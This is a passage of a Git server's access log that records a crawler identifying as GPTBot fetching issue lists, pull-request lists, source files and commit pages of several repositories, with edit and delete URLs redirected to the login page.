"https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" +[17/Feb/2026:18:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:54:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:54:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:18:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" +[17/Feb/2026:18:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fOpcUaMinimal.csproj" [Client 74.7.227.38] [Length 21822] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:18:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 12714] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:18:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:18:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:18:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt?display=source" [Client 74.7.227.38] [Length 12731] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt?display=rendered" [Client 74.7.227.38] [Length 11177] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 1051] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 2731] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 9857] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 12224] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:18:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:18:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" +[17/Feb/2026:18:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16419] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11214] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:18:55:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10" [Client 74.7.227.38] [Length 24515] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fmodbus_tcp.cpp" [Client 74.7.227.38] [Length 27554] [Gzip 7.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" +[17/Feb/2026:18:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2flibcomm_core.so" [Client 74.7.227.38] [Length 24158] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fapp_init.hpp" [Client 74.7.227.38] [Length 23086] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10" [Client 74.7.227.38] [Length 61183] [Gzip 12.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply" [Client 74.7.227.38] [Length 61730] [Gzip 14.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2fquery" [Client 74.7.227.38] [Length 